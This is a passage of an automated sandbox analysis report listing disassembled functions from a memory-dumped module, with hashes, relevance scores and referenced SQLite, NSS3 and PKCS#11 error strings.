Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID:
String ID: *?[$noskipscan*$sz=[0-9]*$unordered*
API String ID: 0-3485574213
Opcode ID: 11b0af16d7c3440d00b22ad7366ef8e93c10f31bd00c578f54396d2da0a96c27
Instruction ID: 2e74b8ca3a4b5cc37246c3fba06c29e0a929e5c3170e9aeaf148969e1a3fd73f
Opcode Fuzzy Hash: 11b0af16d7c3440d00b22ad7366ef8e93c10f31bd00c578f54396d2da0a96c27
Instruction Fuzzy Hash: 66716B72F001114BEB148E6DE8803AA73A29F8539CF294239CD59EBBD2D6719CC687D1

Function 6CA23EC0 Relevance: 4.3, Strings: 3, Instructions: 583COMMON

Download Yara Rule

Strings

sqlite_master, xrefs: 6CA2463F
sqlite_temp_master, xrefs: 6CA2460F
sqlite_, xrefs: 6CA23FAA, 6CA24185

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID:
String ID: sqlite_$sqlite_master$sqlite_temp_master
API String ID: 0-4221611869
Opcode ID: b13aebc29a544ec896ba9e67f1d62f61931ca372d0bc4e9365a361d866fefa2e
Instruction ID: ed98dd4769da9e2279641e91934c1f2e0e757d5e1d88bc092015bf9a3f95a760
Opcode Fuzzy Hash: b13aebc29a544ec896ba9e67f1d62f61931ca372d0bc4e9365a361d866fefa2e
Instruction Fuzzy Hash: D9224935B4A6B54FEB05CB6580606F67BF2AF47318B6C4598C9E15FA42D22DECC2C780

Function 6CB5BE70 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 1029COMMON

Download Yara Rule

Strings

`, xrefs: 6CB5C0B6

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 93fae0b88615d98db7f4751fe57e7f46100144551f81d5947edacde3c3ea03b1
Instruction ID: 1c5955d0fdb8cd58d8b766971c856e00fc9eb3f9b88b11aa0af8839e1494074b
Opcode Fuzzy Hash: 93fae0b88615d98db7f4751fe57e7f46100144551f81d5947edacde3c3ea03b1
Instruction Fuzzy Hash: 70928F74A002898FDB05DF94C890BBEB7B2FF48308F684168D915ABB91D735EC66CB51

Function 6C9F3D80 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 164COMMON

Download Yara Rule

APIs

htonl.WSOCK32(00000000), ref: 6C9F3EA9

Strings

0, xrefs: 6C9F3DAB

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: htonl
String ID: 0
API String ID: 2009864989-4108050209
Opcode ID: 098fb9984db6319921b3d266022f920d619e3f0e27ef54170d11356b0544f9b4
Instruction ID: a34e7d38f80d245594a1ee878d04d3cd2fc5ed74dc55f8c255df02c124728245
Opcode Fuzzy Hash: 098fb9984db6319921b3d266022f920d619e3f0e27ef54170d11356b0544f9b4
Instruction Fuzzy Hash: 61512831E490B98BEB15457D88603FEBBB5AF42314F184329C5B5A7AC0C22C854787A2

Function 6CA9EE70 Relevance: 3.2, APIs: 2, Instructions: 223COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA9F019
PK11_GenerateRandom.NSS3(?,00000000), ref: 6CA9F0F9

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: ErrorGenerateK11_Random
String ID:
API String ID: 3009229198-0
Opcode ID: f28674b34aa5c963032b75bc96fe7a21ab5569db4e47a29f8ddf8cc7e5d013c4
Instruction ID: b394e2c43e762c4b90af1ca6f9a31d221ab033198370caf09f90dfd385504852
Opcode Fuzzy Hash: f28674b34aa5c963032b75bc96fe7a21ab5569db4e47a29f8ddf8cc7e5d013c4
Instruction Fuzzy Hash: 3B919071A1021A8BCB14CF69C8D16AEB7F1BF85324F24462DE966A7B80D730A945CB91

Function 6CAC2F70 Relevance: 3.1, APIs: 2, Instructions: 149COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE09A,00000000,00000000,?,6CAE7929), ref: 6CAC2FAC
PR_SetError.NSS3(FFFFE040,00000000,00000000,?,6CAE7929), ref: 6CAC2FE0

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Error
String ID:
API String ID: 2619118453-0
Opcode ID: f9a9687e9985e56adc3a0788508aeba9b01dadd055f107328c2df5c194f1c88c
Instruction ID: 6e00bfdaa37c1990fd2536fb6f8df39dcbcdafa9bf7e23df6235c06b1e29a8d0
Opcode Fuzzy Hash: f9a9687e9985e56adc3a0788508aeba9b01dadd055f107328c2df5c194f1c88c
Instruction Fuzzy Hash: 2F51BF72B069118FDB108E59C880AAA73B1BB45318F294269D9999BB01D735E9C6CB83

Function 6CAE0E20 Relevance: 2.8, APIs: 2, Instructions: 279COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(00000000,?,00000000,00000000,00000000), ref: 6CAE1052
memset.VCRUNTIME140(-0000001C,?,?,00000000), ref: 6CAE1086

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: memcpymemset
String ID:
API String ID: 1297977491-0
Opcode ID: a82a691253b49703489b6a2637e483d570bac983e5ab0bae289d10c60f43f6d7
Instruction ID: ad481bc54a55d9627e75a3811e63d77cf9d8b93c7368fa78177f241d36b94aa8
Opcode Fuzzy Hash: a82a691253b49703489b6a2637e483d570bac983e5ab0bae289d10c60f43f6d7
Instruction Fuzzy Hash: F9A13D71A0125A9FCB08CF99C990AEEB7B6BF4C314B198129E915A7700DB35EC51DBD0

Function 6CA0AC60 Relevance: 2.7, Strings: 2, Instructions: 181COMMON

Download Yara Rule

Strings

winUnlock, xrefs: 6CA0AE18
winUnlockReadLock, xrefs: 6CA0AE9F

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID:
String ID: winUnlock$winUnlockReadLock
API String ID: 0-3432436631
Opcode ID: 54ec520819f2a483f3485615f3f8ce71e1ab2348e6f101765934994b3b2a10da
Instruction ID: 20b304debf54d63c63cc9e599e7aaf0f22bd576220a9d72e6c19e0f3a4f82228
Opcode Fuzzy Hash: 54ec520819f2a483f3485615f3f8ce71e1ab2348e6f101765934994b3b2a10da
Instruction Fuzzy Hash: 36719D716082409FDB14CF28E891AAABBF5FF89314F14CA28F94997301D730AE85CBD1

Function 6CACED70 Relevance: 1.7, APIs: 1, Instructions: 217memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaAlloc_Util.NSS3(00000000,0000003C), ref: 6CACEE3D

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: Alloc_ArenaUtil
String ID:
API String ID: 2062749931-0
Opcode ID: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
Instruction ID: 667362cf4d005e3ac06fe9912c6873f986f35e54fb29a3d55eded2171bb85efc
Opcode Fuzzy Hash: b51203e4b2318080346e191dc444ed80196527117a86a943b733acd6992df4c0
Instruction Fuzzy Hash: 7171D272F017058FD718CF59C8816AAB7F2AB88304F19862DD85697B91D770E980CBD2

Function 6CA04DB0 Relevance: 1.6, Strings: 1, Instructions: 318COMMON

Download Yara Rule

Strings

winUnlockReadLock, xrefs: 6CA05125

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID:
String ID: winUnlockReadLock
API String ID: 0-4244601998
Opcode ID: a06b015bb9e018db42b7d6a44baf6e6c62d50a832a6977ddadfc5163d758360d
Instruction ID: 888b10ce51b6e864e3054249a5366df3895ec3c6d6a72d7fe4e333ceab3fbab1
Opcode Fuzzy Hash: a06b015bb9e018db42b7d6a44baf6e6c62d50a832a6977ddadfc5163d758360d
Instruction Fuzzy Hash: 8AE12A70A18380CFDB05DF28E49565ABBF0FF89358F15862DE89997351E730A985CF82

Function 6CB85E60 Relevance: 1.4, APIs: 1, Instructions: 163COMMON

Download Yara Rule

APIs

Part of subcall function 6CB85B90: PR_Lock.NSS3(00010000,?,00000000,?,6CA6DF9B), ref: 6CB85B9E
Part of subcall function 6CB85B90: PR_Unlock.NSS3 ref: 6CB85BEA

memset.VCRUNTIME140(00000014,00000000,-000000D7,?,?,?,?,?,?,?,?,6CB85E23,6CA6E154), ref: 6CB85EBF

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID: LockUnlockmemset
String ID:
API String ID: 1725470033-0
Opcode ID: 765870e01ac74a1a285e53e67be40ac57547b096a3347e8632765bb24f41ae14
Instruction ID: c1616940c46852f7c8ad0af4bcbc9ea8d56dfe65050fa1d4bed6dff8affa5bbc
Opcode Fuzzy Hash: 765870e01ac74a1a285e53e67be40ac57547b096a3347e8632765bb24f41ae14
Instruction Fuzzy Hash: D551BE72E0121A8FDB18CF59C8815AEF3F2FF88314B19456DD816B7745D730A945CBA0

Function 6CB3DCD0 Relevance: .4, Instructions: 371COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a94407fc22a12f697a2af2811d93ebd0f55988781381ab03c5b2d3c8595d237a
Instruction ID: c88008c10c5ab686240923c3c0c17b9d7bc2ba7ed36dcbef1ffb5f13b4789822
Opcode Fuzzy Hash: a94407fc22a12f697a2af2811d93ebd0f55988781381ab03c5b2d3c8595d237a
Instruction Fuzzy Hash: 31F14A71A012658BDB08CF28D490BAE77B6FF89314F298169D8099B751CB35ED42CBD1

Function 6CAD1DC0 Relevance: .3, Instructions: 345COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cf8dc963f7f79db549299581b4ae9ef430c02c880e9910e3ec163e0518b33a5
Instruction ID: 5c7ebc485a7e2728aa2ccef94211ba88d4737038316bbb467c68f19c52de3a93
Opcode Fuzzy Hash: 5cf8dc963f7f79db549299581b4ae9ef430c02c880e9910e3ec163e0518b33a5
Instruction Fuzzy Hash: BED14772A046568BEB118E18C8843EA7773AB85338F1E4369DD641B7C6C37ABD85C7D0

Function 6CA8A820 Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e856cd427bdec09da49ead1f53d9845e919b70526125a96f937ac547d0597db
Instruction ID: a0e55451e50061f7b94f04328ce4b166de49aac807fb5a0a5d1da962e3b9e42d
Opcode Fuzzy Hash: 1e856cd427bdec09da49ead1f53d9845e919b70526125a96f937ac547d0597db
Instruction Fuzzy Hash: FC519D71A06209CFDB04CF55D944BAA7BE6FF48308F2A806DE8199B790D734DC95CB90

Function 6CA68EA0 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 129ee8b0e7c2c03f8066791b0fe8b0799ae79883dbbfc87baa12476a043c9522
Instruction ID: e5d4ae85eaff2573778b7ea02e5c40189de7bde0d5dd525ffe49cada853e4311
Opcode Fuzzy Hash: 129ee8b0e7c2c03f8066791b0fe8b0799ae79883dbbfc87baa12476a043c9522
Instruction Fuzzy Hash: CA11BC32A012158BD708CF26D894B5AB3B9BF4631CF08826AD8158FE41C775E8C6C7C1

Function 6CB40C40 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 273e4d78ad259562d683827f3a94d86da398ea4555c5e30f9138df8c5c4e0de4
Instruction ID: e7c0f557f005585d518125016a82310925d380548491207d624df8c777e69dc9
Opcode Fuzzy Hash: 273e4d78ad259562d683827f3a94d86da398ea4555c5e30f9138df8c5c4e0de4
Instruction Fuzzy Hash: 6E11C175708385DFCB00DF28D88066A77A5FF95368F14C069D8198B706DB71E806CBA1

Function 6CB40D60 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
Instruction ID: bf77639f58be5cefc6d3b0db3e8c1980e570a3e112322b1db879e4b408256f55
Opcode Fuzzy Hash: 9ba2eb2004aedd4f77228f2367ef2a228ee838c060cfdc78aa45cc4f3a876bfd
Instruction Fuzzy Hash: D5E0923A20A0B4A7DB148E09E450AA97369DF91619FB4C07DCC5D9FA05D733F8079B82

Function 6CA6CC60 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2691685175.000000006C9F1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C9F0000, based on PE: true

Associated: 00000000.00000002.2691656239.000000006C9F0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691865798.000000006CB8F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691915342.000000006CBCE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2691960634.000000006CBCF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692021361.000000006CBD0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2692065416.000000006CBD5000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c9f0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47d220cecef7cd456a47faf708ed9ee07305edf3f78815286ab46bb67c23c764
Instruction ID: 3cccacc6b9361c93bb1860b43ec0047444e32987d0f5db0bc23d1fa8df06afd3
Opcode Fuzzy Hash: 47d220cecef7cd456a47faf708ed9ee07305edf3f78815286ab46bb67c23c764
Instruction Fuzzy Hash: CAC04838244608CFC704DB08E4A99A43BA8AB0961070440A4EA028B721DA21F800CA80

Function 6CAA1D60 Relevance: 84.2, APIs: 1, Strings: 47, Instructions: 210COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3( rv = %s,CKR_FUNCTION_REJECTED,?,6CAA1D46), ref: 6CAA2345

Strings

CKR_DEVICE_ERROR, xrefs: 6CAA229D
rv = 0x%x, xrefs: 6CAA2312
CKR_DEVICE_REMOVED, xrefs: 6CAA2261
CKR_TOKEN_RESOURCE_EXCEEDED, xrefs: 6CAA2293, 6CAA233F
CKR_PIN_INVALID, xrefs: 6CAA2057
CKR_PIN_INCORRECT, xrefs: 6CAA1D92
CKR_PIN_LOCKED, xrefs: 6CAA2075
CKR_NEXT_OTP, xrefs: 6CAA222F
CKR_OPERATION_CANCEL_FAILED, xrefs: 6CAA1F77
CKR_SAVED_STATE_INVALID, xrefs: 6CAA1E56
CKR_RANDOM_NO_RNG, xrefs: 6CAA22A7
CKR_TEMPLATE_INCONSISTENT, xrefs: 6CAA1EE1
CKR_TEMPLATE_INCOMPLETE, xrefs: 6CAA1F95
CKR_MUTEX_NOT_LOCKED, xrefs: 6CAA2225
CKR_STATE_UNSAVEABLE, xrefs: 6CAA2037
CKR_PIN_EXPIRED, xrefs: 6CAA206B
CKR_INFORMATION_SENSITIVE, xrefs: 6CAA22B1
CKR_SIGNATURE_LEN_RANGE, xrefs: 6CAA20D9
CKR_FUNCTION_REJECTED, xrefs: 6CAA2289
CKR_RANDOM_SEED_NOT_SUPPORTED, xrefs: 6CAA22FF
CKR_FUNCTION_CANCELED, xrefs: 6CAA1E73
CKR_DOMAIN_PARAMS_INVALID, xrefs: 6CAA2015
CKR_DEVICE_MEMORY, xrefs: 6CAA1FF3
CKR_WRAPPING_KEY_HANDLE_INVALID, xrefs: 6CAA2320
CKR_WRAPPED_KEY_INVALID, xrefs: 6CAA1FB5
CKR_WRAPPING_KEY_SIZE_RANGE, xrefs: 6CAA2327
CKR_PIN_LEN_RANGE, xrefs: 6CAA2061
CKR_CURVE_NOT_SUPPORTED, xrefs: 6CAA2179
CKR_OPERATION_ACTIVE, xrefs: 6CAA22B8
CKR_OPERATION_NOT_INITIALIZED, xrefs: 6CAA1FD7
CKR_BUFFER_TOO_SMALL, xrefs: 6CAA2183
CKR_TOKEN_NOT_PRESENT, xrefs: 6CAA1F81
CKR_OK, xrefs: 6CAA1DFC
CKR_TOKEN_NOT_RECOGNIZED, xrefs: 6CAA1F8B
CKR_FUNCTION_NOT_PARALLEL, xrefs: 6CAA218D
CKR_ENCRYPTED_DATA_INVALID, xrefs: 6CAA226B
